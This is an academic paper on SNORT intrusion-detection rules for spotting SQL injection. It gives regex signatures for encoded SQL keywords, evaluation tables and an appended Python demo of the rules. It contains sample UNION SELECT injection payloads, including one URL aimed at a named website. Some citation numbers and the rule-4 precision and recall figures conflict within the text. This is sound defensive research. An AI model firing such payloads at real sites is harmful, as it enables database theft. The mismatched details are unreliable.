Detecting SQL Injection Attacks Using SNORT IDS

Conference Paper · November 2014
DOI: 10.1109/APWCCSE.2014.7053873

Hussein Alnabulsi, Md Rafiqul Islam and Quazi Mamun
School of Comp & Mathematics, Charles Sturt University
Albury, NSW, Australia (Alnabulsi, Islam); Wagga Wagga, NSW, Australia (Mamun)
halnabulsi@csu.edu.au, mislam@csu.edu.au, qmamun@csu.edu.au

Abstract—SQL injection attack poses a serious security threat to the Internet community nowadays, and it continues to increase by exploiting flaws found in Web applications. In an SQL injection attack, the attacker can take advantage of poorly coded web application software to introduce malicious code into the system and/or retrieve important information. Web applications are under siege from cyber criminals seeking to steal confidential information and to disable or damage the services offered by these applications. Therefore, additional steps must be taken to ensure data security and the integrity of the applications. In this paper we propose an innovative solution to filter SQL injection attacks using the SNORT IDS. The proposed detection technique uses the SNORT tool, augmented with a number of additional SNORT rules. We evaluate the proposed solution by comparing our method with several existing techniques. Experimental results demonstrate that the proposed method outperforms other similar techniques on the same data set.

Keywords—SQL Injection, SNORT, Intrusion detection, topology.

I. INTRODUCTION

The Internet has rapidly become an integral part of everyday life and our reliance on it is expected to continue to grow. However, its rapid adoption has also left it susceptible to misuse and/or abuse. Along with the growth of the Internet, there has been a dramatic growth in SQL Injection Attacks (SQLIA) [1]. It is a major concern that, despite the increasing development of IDS (Intrusion Detection System) and antimalware services and technologies, the volume of SQLIA continues to grow day by day [1]. Therefore, effective and efficient detection techniques are of critical importance to the computer user community. Over the last decade, researchers have adopted a diversity of solutions in order to control SQLIA [1, 2, 3, 13, 14, 15, 6 & 16]. SQLIA is one of the most devastating techniques for stealing data from the backend. It has also been argued that SQLIA is among the top ten security threats in web applications [6]. Using this kind of attack an attacker can get access to the database and steal classified information. The concept of IDS first appeared in James Anderson's technical report [2] in 1980. This first generation IDS could monitor, audit, and log an attacked machine. Its main task was to search the audit logs for predefined patterns of suspicious activity [2]. Most IDSs are reliable in detecting suspicious actions by evaluating TCP/IP connections or log files; when the IDS finds a suspicious action, it creates an alert which contains information about the source, the target, and the type of the attack. SNORT is one of the effective and popular rule-based Network Intrusion Detection System (NIDS) tools for identifying intrusion attacks [3]. It is open-source software developed by Martin Roesch [3], and it uses regular expression-based rules for intrusion detection. SNORT is a packet sniffer that monitors network traffic in real time and supports protocols including TCP, UDP, IP and ICMP [3]. It inspects each packet closely to detect an unsafe payload or suspicious anomalies. When suspicious behavior is identified, SNORT immediately generates a real-time alert by logging it to the alert file and/or activating a popup window. SQL Injection and XSS (Cross-site scripting) are the most common and serious web application vulnerabilities threatening the privacy and security of both clients and applications nowadays [6]. They pose serious threats to the Internet user community due to their recent dynamic attack patterns [10]. Current IDSs are not sufficient to prevent attacks or to generate real-time security alerts to users [8]. It has been investigated how SQL injection attacks are conducted and how hackers use SQL injection to attack web applications [9]. To mitigate this problem, developers have proposed a range of coding guidelines that promote defensive coding practices, such as encoding and validating user input [6]. Researchers have also proposed many vulnerability detection approaches such as static taint analysis [4] and concolic testing [5]; however, these techniques suffer from a high number of FP (false positive) instances.

Conversely, there are many types of SQLIAs and numerous variations of their basic types. However, researchers are often unaware of these variations, and most of the proposed solutions detect or prevent only a subset of the possible SQLIAs. Therefore, it has become a challenge for the research community to develop an active defense technique against SQL Injection and XSS attacks. Keeping this in mind, we have investigated several alternatives for SNORT rules and evaluated their performance. Based on our investigations, we propose a set of rules for the SNORT tool. Our empirical results show that our technique outperforms similar existing techniques on a similar data set.

The main contributions of this paper are threefold:

A. Analyse the SNORT IDS and propose five different SNORT rules.
B. Apply the proposed SNORT rules in our experiment for detection evaluation.
C. Apply our method on Damn Vulnerable Web Application (DVWA) to evaluate the performance.

The rest of the paper is organized as follows: section 2 discusses the related work, section 3 outlines the problem statement, section 4 discusses the proposed SNORT rules and section 5 demonstrates the experimental setup and results. Finally the paper concludes with discussion and conclusion.

II. RELATED WORK

In [11] Veerman and Oprea present different SQL Injection attacks and their solutions based on the SNORT tool. They also proposed a method that is used by many organizations who wish to leverage their IDS experience. They captured some SQL Injection attack patterns; however, their attack patterns only extract signature-based features, which cannot offer protection against more recent attacks. Their approach can detect insider attacks up to 70% of all database attacks (such as resource exhaustion and password attacks) and malware attacks (such as viruses, worms and Trojan horses).

Warneck [12] uses many ways of defeating the SQL injection attack to prevent the vulnerabilities related to web attacks, by using the SNORT tool for detecting various types of SQL injection attacks at both the database level and the web application level.

Dabbour et al. [13] presented three types of attacks: SQL injection attacks, XSS (Cross Site Scripting) attacks, and command execution attacks. They also use the SNORT IDS for detection and Damn Vulnerable Web Application (DVWA) for evaluating and testing the SNORT rules.

Deuble [15] investigates how to detect and alert on SQL injection, XSS, query command injection, and OS command injection attacks on web applications using SNORT tools. They use the Samurai WTF (Web Testing Framework) distribution, Damn Vulnerable Web Application (DVWA), and Security Onion instances for SNORT in their experimental process.

Mookhey et al. [14] present SNORT tools for detecting SQL injection and XSS attacks. They implemented web attack detection using ID3, an algorithm that uses a greedy approach by selecting the best attribute on which to split the dataset at each iteration. Out of 1771 generated attacks they were able to detect 1282 attacks successfully.

It is obvious from the literature that none of the existing techniques can offer a complete solution to protect the user as well as the web application from SQLIA. Therefore, it is an open challenge to researchers to find an optimum solution against SQLIA.

III. PROPOSED APPROACH USING SNORT IDS

This section presents our proposed method based on the SNORT IDS. In our previous work [7], we presented the basic architecture of the SNORT modules as illustrated in Figure 1.

Fig. 1. SNORT architecture [7].

According to Fig. 1, the SNORT modules perform the following tasks:

A. Packet Capture Module.
This module is built on the popular packet programming library libpcap, which provides implementation-independent access to the packet capture facility provided by the operating system, to provide a high-level interface for capturing packets.

B. Decoder.
This module dissects the captured packets into various data structures and identifies the links to be checked in the next module, such as suspicious connection attempts to some TCP/UDP ports, or too many packets sent in a short period.

C. Preprocessors.
SNORT's preprocessors fall into two categories. They can be used either to examine packets for suspicious activity or to modify packets so that the next module can properly interpret them. The other preprocessors are responsible for categorizing traffic so that the next module can accurately match signatures. These preprocessors defeat attacks that attempt to evade SNORT's detection engine by manipulating traffic patterns.

D. Detection Engine.
This module uses the detection plug-ins and matches the packets against the rules loaded into memory during SNORT initialization.

E. Detection Plug-ins.
The detection plug-in definitions are in the rules files. They are used to identify patterns.

F. Rules Files.
These are text files containing a list of rules with a known syntax. The syntax includes protocols, addresses, and some other important data.
G. Output Plug-ins.
This module formats the notifications (alerts, logs) so that the user can access them in many ways (databases, console, and external files) [7].

IV. PROPOSED SNORT RULES

In this section we propose some new SNORT rules for the detection of SQLIA. In our proposed rules we use a number of signature words, namely ((OR%20), (OR+), (%0A), (OR/*), (LIKE), (CONCAT), (VERSION), (HOSTNAME), (DATADIR), and (UUID)), together with all of their possible hexadecimal encodings for capital and small letters.

A. Rule #1

alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection – Start Attacks1…… - SQL";
    pcre:"/((((((\%6f)|(o)|(\%4f))((\%52)|(r)|(\%72))(%20))|(((\%6f)|(o)|(\%4f))((\%52)|(r)|(\%72))((%2b)|(\+))))|((\%0a))|(((((\%6f)|(o)|(\%4f))((\%72)|(r)|(\%52))((\/)|(\%2f))((\*)|(\%2a)))))|(((((\%4c)|(l)|(\%6c))((\%69)|(i)|(\%49))((\%6b)|(k)|(%4b))((\%65)|(e)|(\%45)))))|(((((\%63)|(c)|(\%43))((\%6f)|(o)|(\%4f))((\%6e)|(n)|(\%4e))((\%63)|(c)|(\%43))((\%61)|(a)|(\%41))((\%74)|(t)|(\%54))((\%76)|(v)|(\%56))((\%65)|(e)|(\%45))((\%72)|(r)|(\%52))((\%73)|(s)|(\%53))((\%69)|(i)|(\%49))((\%6f)|(o)|(\%4f))((\%6e)|(n)|(\%4e)))|(((\%68)|(h)|(\%48))((\%6f)|(o)|(\%4f))((\%73)|(s)|(\%53))((\%74)|(t)|(\%54))((\%6e)|(n)|(\%4e))((\%61)|(a)|(\%41))((\%6d)|(m)|(\%4d))((\%65)|(e)|(\%45)))|(((\%55)|(u)|(\%75))((\%55)|(u)|(\%75))((\%49)|(i)|(\%69))((\%44)|(d)|(\%64)))|(((\%64)|(d)|(\%44))((\%61)|(a)|(\%41))((\%74)|(t)|(\%54))((\%61)|(a)|(\%41))((\%64)|(d)|(\%44))((\%69)|(i)|(\%49))((\%72)|(r)|(\%52)))))))/i";
    classtype: Web-application-attack; sid:9383; rev:19;)

This rule is able to detect all of the signature words ((OR%20), (OR+), (%0A), (OR/*), (LIKE), (CONCAT)) with all of their possible hexadecimal encodings for capital and small letters.

B. Rule #2

The signature words are ((OR%20), (OR+), (%0A), (OR/*), (LIKE), (CONCAT), (VERSION), (HOSTNAME), (DATADIR), and (UUID)). The proposed second rule is:

alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection – Start Attacks1…… - SQL";
    pcre:"/(\'%20or)|(\%27\%20or)|(\%27\%20\%6f%72)|(\%27\%20\%6f%52)|(\%27\%20\%4f%72)|(\%27\%20\%4f%52)|(\%27\%20\O%52)|(\%27\%20\%4fR)|(\%27\%20\%6fR)|(\%27\%20\O%72)|(\%20or)|(\%20\%6f%72)|(\%20\%6f%52)|(\%20\%4f%72)|(\%20\%4f%52)|(\%20\O%52)|(\%20\%4fR)|(\%20\%6fR)|(\%20\O%72)|(\%0aor)|(\%0a\%6f%72)|(\%0a\%6f%52)|(\%0a\%4f%72)|(\%0a\%4f%52)|(\%0a\O%52)|(\%0a\%4fR)|(\%0a\%6fR)|(\%0a\O%72)|(\*%2for)|(\*/\or)|(\%2a/\or)|(\%2a%2for)|(\%2a%2f\%6f%72)|(\%2a%2f\%6f%52)|(\%2a%2f\%4f%72)|(\%2a%2f\%4f%52)|(\%2a%2f\O%52)|(\%2a%2f\%4fR)|(\%2a%2f\%6fR)|(\%2a%2f\O%72)|(like)|(\%6c\%69\%6b\%65)|(\%4c\%49\%4b\%45)|(concat)|(\%63\%6f\%6e\%63\%61\%74)|(\%43\%4f\%4e\%43\%41\%54)|(version)|(\%76\%65\%72\%73\%69\%6f\%6e)|(\%56\%45\%52\%53\%49\%4f\%4e)|(hostname)|(\%68\%6f\%73\%74\%6e\%61\%6d\%65)|(\%48\%4f\%53\%54\%4e\%41\%4d\%45)|(uuid)|(\%55\%55\%49\%44)|(\%75\%75\%69\%64)|(datadir)|(\%64\%61\%74\%61\%64\%69\%72)|(\%44\%41\%54\%41\%44\%49\%52)/i";
    classtype: Web-application-attack; sid:9383; rev:19;)

C. Rule #3

We propose the third SNORT rule to detect all attempts to enter the pages that are connected with a database of the website. These pages contain a question mark "?" in their URL, so by using this SNORT rule we detect the ways of writing SQL injection queries. The third SNORT rule is:

alert tcp any any -> $HOME_NET any (msg:"SQL Injection Attacks -?-";
    pcre:"/(\%3f)|(/?)/ix";
    classtype:web-application-attack; sid:1100; rev:21;)

This rule will prevent every SQLIA with a short command line. It also identifies the attack when the attacker attempts SQL injection against a website connected to a database. The following example shows a target vulnerable website with a question mark [?] in its URL:

http://www.unitedpurpose.org/archive/article.php?id=-100%20union%20select%20%20%201,2,3,id,5,6,7,8,9,10,11,12,13%20from%20chapters%20where%20id=1%20or%201=1—

D. Rule #4

The fourth SNORT rule is proposed only for one statement signature, (UNION SELECT), with all of its possible hexadecimal encodings, no matter how many characters lie between the two words (UNION SELECT). We used the code signature ( [^\n]* ) in our rules, which means any character(s) between these two words, i.e. (UNION SELECT).

alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection – Start Attacks4…… - SQL";
    pcre:"/((((\%55)|(u)|(\%75))((\%4e)|(n)|(\%6e))((\%69)|(i)|(\%49))((\%6f)|(o)|(\%4f))((\%4e)|(n)|(\%6e)))[^\n]*(((\%73)|(s)|(\%53))((\%65)|(e)|(\%45))((\%6c)|(l)|(\%4c))((\%65)|(e)|(\%45))((\%63)|(c)|(\%43))((\%74)|(t)|(\%54))))/i";
    classtype: Web-application-attack; sid:9397; rev:28;)

E. Rule #5

alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection – Start Attacks4…… - SQL";
    flow:established,to_server;
    pcre:"/((\?)[^\n]*(\=)[^\n]*((\%55)|(u)|(\%75))((\%4e)|(n)|(\%6e))((\%69)|(i)|(\%49))((\%6f)|(o)|(\%4f))((\%4e)|(n)|(\%6e)))/i";
    classtype: Web-application-attack; sid:9397; rev:28;)

This proposed SNORT rule detects just the ( ? = UNION ) statement signature, with all of its possible hexadecimal encodings for capital and small letters and with any characters between these three characters and words ( ? = UNION ). We used the code signature ( [^\n]* ), which means any characters between these three characters and words ( ? = UNION ). It is almost impossible that a normal legitimate user or web page uses these three words together. Only an attacker would use these three characters and words (? = UNION) for SQL Injection Attacks.

The drawback of this SNORT rule is its speed. This SNORT rule is slow because we used "PCRE" for detection; if we want to consider speed in our research study, it is better to use "content" or "uricontent" together with "PCRE" in SNORT rules to obtain faster detection. So the proposed SNORT rule, after adding "uricontent" to "PCRE", becomes:

alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection – Start Attacks4…… - SQL";
    flow:established,to_server;
    uricontent:"?"; uricontent:"="; uricontent:"union"; nocase;
    pcre:"/((\?)[^\n]*(\=)[^\n]*((\%55)|(u)|(\%75))((\%4e)|(n)|(\%6e))((\%69)|(i)|(\%49))((\%6f)|(o)|(\%4f))((\%4e)|(n)|(\%6e)))/i";
    classtype: Web-application-attack; sid:9397; rev:28;)

If the signature words or characters for a SNORT rule are more than one word or character, and the SNORT rule detects these signature words or characters together rather than each one alone, it will produce a SNORT rule with a very low false positive (false alarm) rate.

V. EXPERIMENTAL SETUP

This section describes our experimental setup and classification process. It consists of three sub-sections:

A. Data set

In our experiment, we have used our own data collected from diverse websites, both normal websites and injected websites. In our data set, we used 46 examples of SQL injection attacks and 114 normal websites. The normal website examples are shown in Table 3 in Appendix A, and the vulnerable website examples are shown in Table 4 in Appendix B.

B. Experiment

The methodology of our experiment summarizes the major steps taken to accomplish the result. We used the SNORT tool under the Linux operating system to detect SQL injection attacks, and we used DVWA (Damn Vulnerable Web Application) for testing. DVWA is a web server, so we insert malicious SQL injection attacks into the vulnerable web server that we built using DVWA, and then we see whether the SNORT rule can detect every SQL injection attack inserted into the vulnerable web server.

C. Results

Table 1 shows the testing results of our experiment. It has been shown that the proposed rule 5 shows the best result in all parameters, i.e. FP, FN, Precision and Recall. The precision rate is good for all rules except rule 2, and there are some false negative instances.

TABLE I. EXPERIMENTAL RESULTS

Rule Number   False Positive   False Negative   Precision Rate   Recall Rate
Rule 1        15               0                1                0.7540
Rule 2        15               12               0.7391           0.6938
Rule 3        17               0                1                0.7301
Rule 4        4                0                1                0.9387
Rule 5        0                0                1                1

VI. DISCUSSION

In this paper we have proposed five SNORT rules to detect SQLIAs. We have demonstrated our method using our own data set, and the results are presented in Table 1. It has been shown from Table 1 that our proposed rules show improved performance in terms of precision and recall; in particular rule 5 shows 100% detection accuracy, which is significant. Also, our fourth SNORT rule gives precision rate = 0.9387 and recall rate = 1, and the other rules give comparable results. From Table 1, it is clear that rules 1, 2 and 3 show some FP instances. This is because of the presence of the words ((OR), (LIKE), (CONCAT)) when a user connects to the web pages, or because the web pages themselves have similar words in their URL. Also, it is common for the user to type a question mark sign [?], or the web pages could have a question mark sign [?] in their URL. However, the false negative for rules 1 and 3 is zero. Another drawback of rule 4 is slow processing due to the use of "PCRE" in the detection process, which we already discussed in section 4.

A. Comparison with similar existing techniques

We have compared our results with similar existing works. The following table shows the comparative study with other works in terms of Precision and Recall rate.

TABLE II. SUMMARY TABLE FOR COMPARING STUDY

Existing works             Precision Rate   Recall Rate
Dabbour et al. (2013)      1                0.1921
Deuble (2012)              0.9545           0.9121
Warneck (2007)             1                0.1372
Mookhey et al. (2007)      1                0.1941
Veerman et al. (2012)      1                0.0208
Our First SNORT Rule       1                0.7540
Our Second SNORT Rule      0.7391           0.6938
Our Third SNORT Rule       1                0.7301
Our Fourth SNORT Rule      1                0.9387
Our Fifth SNORT Rule       1                1

It is obvious from Table 2 above that our proposed rules outperform similar existing techniques, which justifies the scalability of our method. However, one of the problems we have faced relates to data access in web applications; the vulnerabilities exploited by hackers are SQL injection vulnerabilities and XSS vulnerabilities. We used SNORT as the IDS because of its good reputation as an intrusion detection system for these types of attacks (SQL injection and XSS), and we succeeded in obtaining very good results for detecting SQL injection attacks using the SNORT IDS.
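As an added example (not code from the paper or from the Snort project), the following Python generalises the hex-or-literal alternation that rules 1, 4 and 5 in section IV write out by hand, emulates the uricontent prefilter recommended there for rule 5, and runs the resulting matchers over constructed HTTP requests, two of which use legitimate hostnames from the paper's Table III to show the word-based false positives the Discussion describes. The rule names, the sample requests and the placeholder host app.example are this example's own assumptions.

```python
import re
from urllib.parse import unquote


def hex_or_literal(ch: str) -> str:
    r"""One keyword character in the paper's form: the upper-case %XX encoding,
    the literal letter, then the lower-case %xx encoding. For 'u' this gives
    ((\%55)|(u)|(\%75)), the fragment that rules 4 and 5 write out by hand."""
    return f"((\\%{ord(ch.upper()):02x})|({re.escape(ch)})|(\\%{ord(ch.lower()):02x}))"


def keyword(word: str) -> str:
    """Chain the per-character alternations so any mix of literal and
    percent-encoded letters is accepted; the /i flag handles letter case."""
    return "(" + "".join(hex_or_literal(c) for c in word) + ")"


# Constructed rule table shaped like the paper's rules 1, 4 and 5. "tokens" are
# the uricontent prefilters (rules 1 and 4 have none; the paper runs them on
# PCRE alone); "pcre" is applied to the raw payload, as Snort's pcre option
# does without the /U modifier.
RULES = {
    # the word part of rule 1: LIKE, CONCAT, VERSION, HOSTNAME, UUID, DATADIR
    "rule1_words": {
        "tokens": (),
        "pcre": "|".join(keyword(w) for w in
                         ("like", "concat", "version", "hostname", "uuid", "datadir")),
    },
    # rule 4: UNION, then anything except a newline, then SELECT
    "rule4": {"tokens": (), "pcre": keyword("union") + r"[^\n]*" + keyword("select")},
    # rule 5 in its uricontent:"?"; uricontent:"="; uricontent:"union"; nocase form
    "rule5": {"tokens": ("?", "=", "union"),
              "pcre": r"(\?)[^\n]*(\=)[^\n]*" + keyword("union")},
}
COMPILED = {name: re.compile(rule["pcre"], re.IGNORECASE) for name, rule in RULES.items()}


def request_uri(payload: str) -> str:
    """Return the request-URI from the HTTP request line, or '' if absent."""
    parts = payload.split("\r\n", 1)[0].split(" ")
    return parts[1] if len(parts) == 3 else ""


def uri_prefilter(payload: str, tokens) -> bool:
    """Emulate uricontent ... nocase. Snort searches the normalized request
    URI, so the substring checks run on a URL-decoded, lower-cased copy; a
    check on the raw bytes would reject a percent-encoded keyword that the
    PCRE itself still catches."""
    norm = unquote(request_uri(payload)).lower()
    return all(token.lower() in norm for token in tokens)


def rule_fires(name: str, payload: str) -> bool:
    """Cheap substring prefilter first; the regular expression only if it passes."""
    if not uri_prefilter(payload, RULES[name]["tokens"]):
        return False
    return COMPILED[name].search(payload) is not None


def scan(payload: str) -> dict:
    """Map every rule name to whether it would alert on this payload."""
    return {name: rule_fires(name, payload) for name in RULES}


# Constructed sample requests, not taken from the paper's data set. Hosts are
# placeholders except the two hostnames that appear in the paper's Table III.
SAMPLES = [
    # UNION SELECT injection in the query string
    "GET /article.php?id=-1%20UNION%20SELECT%201,2,3 HTTP/1.1\r\nHost: app.example\r\n",
    # the same with UNION percent-encoded (%55%4e%49%4f%4e) and SELECT in mixed case
    "GET /article.php?id=-1%20%55%4e%49%4f%4e%20SeLeCt%201,2,3 HTTP/1.1\r\nHost: app.example\r\n",
    # legitimate site whose hostname contains "unionselect" (Table III)
    "GET / HTTP/1.1\r\nHost: www.unionselectacademy.com\r\n",
    # legitimate site whose hostname contains "concat" (Table III)
    "GET / HTTP/1.1\r\nHost: www.concat.com.au\r\n",
    # legitimate search whose parameter value contains the word "union"
    "GET /search.php?q=credit+union HTTP/1.1\r\nHost: app.example\r\n",
]


def scan_all(payloads=SAMPLES) -> list:
    return [scan(p) for p in payloads]


if __name__ == "__main__":
    for payload, hits in zip(SAMPLES, scan_all()):
        print(payload.split("\r\n")[0], "->", [n for n, hit in hits.items() if hit])
```

Both injected requests trip rules 4 and 5, while the rule-1 words and rule 4 also fire on the two Table III hostnames; rule 5 stays quiet on those but does fire on the last benign query, the kind of input the paper's data set (zero false positives for rule 5) evidently did not contain.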
VII. CONCLUSION

In this paper, we propose a number of SNORT rules to detect SQLIAs. The SNORT rules we present show a significant improvement in performance in detecting SQL injection attacks. In some cases the proposed rules achieve 100% success in detection with zero false alarms, in particular rule 5 (Table 1).

However, some of our rules show some FP and FN instances, which we discussed in the discussion section.

In our future work we are planning to use more data sets with diverse feature set extraction and selection to test our rules.

References

[1] P. Kumar, "R.K.A survey on SQL injection attacks, detection and prevention techniques", First International Conference, pp. 1-5, 2012.
[2] U. Aickelin, J. Twycross and T. HeskethRoberts, "Rule Generalisation using Snort", International Journal of Electronic Security and Digital Forensics (IJESDF), Volume 1, Issue 1, pp. 101-116, January 2007.
[3] S. Eckmann, "Translating Snort rules to STATL scenarios", In Proc. Recent Advances in Intrusion Detection, pp. 1-13, October 2001.
[4] J. Demšar, "Statistical comparisons of classifiers over multiple data sets", Journal of Machine Learning Research, Vol. 7, pp. 1-30, January 2006.
[5] A. Kieżun, P. Guo, K. Jayaraman, and M. Ernst, "Automatic creation of SQL injection and cross-site scripting attacks", International Conference on Software Engineering, Vol. 46, Issue 3, pp. 69-77, 2009.
[6] M. Howard and D. LeBlanc, "Writing Secure Code", Microsoft Press, Redmond, Washington, second edition, Vol. 45, Issue 2, pp. 66-72, 2003.
[7] H. ALNabulsi, I. Alsmadi, M. Al-Jarrah, "Textual Manipulation for SQL Injection Attacks", In. J. of Computer Network and Information Security (IJCNIS), Volume 1, Issue 1, pp. 26-33, 2014.
[8] Miguel A. Calvo Moya, "Analysis and Evaluation of the SNORT and Bro Network Intrusion Detection Systems", Ph.D. dissertation, Comillas Pontifical University, Dept. BSC, September 2009.
[9] Y. Wang, Z. Li, "SQL Injection Detection with Composite Kernel in Support Vector Machine", International Journal of Security and Its Applications, Vol. 6, No. 2, April 2012.
[10] S. Patil, N. Karhade, Y. Kothekar, "Honeyweb: a web-based high interaction client honeypot", International Journal of Engineering Research and Applications (IJERA), Vol. 2, Issue 5, pp. 1695-170, March 2012.
[11] Z. Xin-hua, W. Zhi-jian, "A Static Analysis Tool for Detecting Web Application Injection Vulnerabilities for ASP Program", IEEE, Vol. 1, Issue 1, pp. 127-13, 2010.
[12] G. Veerman, R. Oprea, "Database SQL Injections Detection & Protection", University van Amsterdam, May 30, 2012.
[13] B. Warneck, "Defeating SQL Injection IDS Evasion", SANS Institute, Vol. 1, Issue 4, pp. 16-30, January 2007.
[14] M. Dabbour, I. Alsmadi and E. Alsukhni, "Efficient Assessment and Evaluation for Websites Vulnerabilities Using SNORT", Vol. 7, No. 1, January 2013.
[15] K. K. Mookhey, Nilesh Burghate, "Detection of SQL Injection and Cross-site Scripting Attacks", SecurityFocus Infocus article, Created March 2004, Vol. 1, Issue 2, pp. 292-302, Updated Nov 2010.
[16] A. Deuble, "Detecting and Preventing Web Application Attacks with Security Onion", SANS Institute, Vol. 4, Issue 1, pp. 26-33, 26 July 2012.

Appendix A

TABLE III. THE NORMAL WEBSITES EXAMPLES

[The list of 114 normal website URLs that makes up this table is omitted here.]
Appendix B

TABLE IV. THE SQL INJECTION ATTACKS EXAMPLES

[The list of 46 SQL injection attack URLs that makes up this table is omitted here.]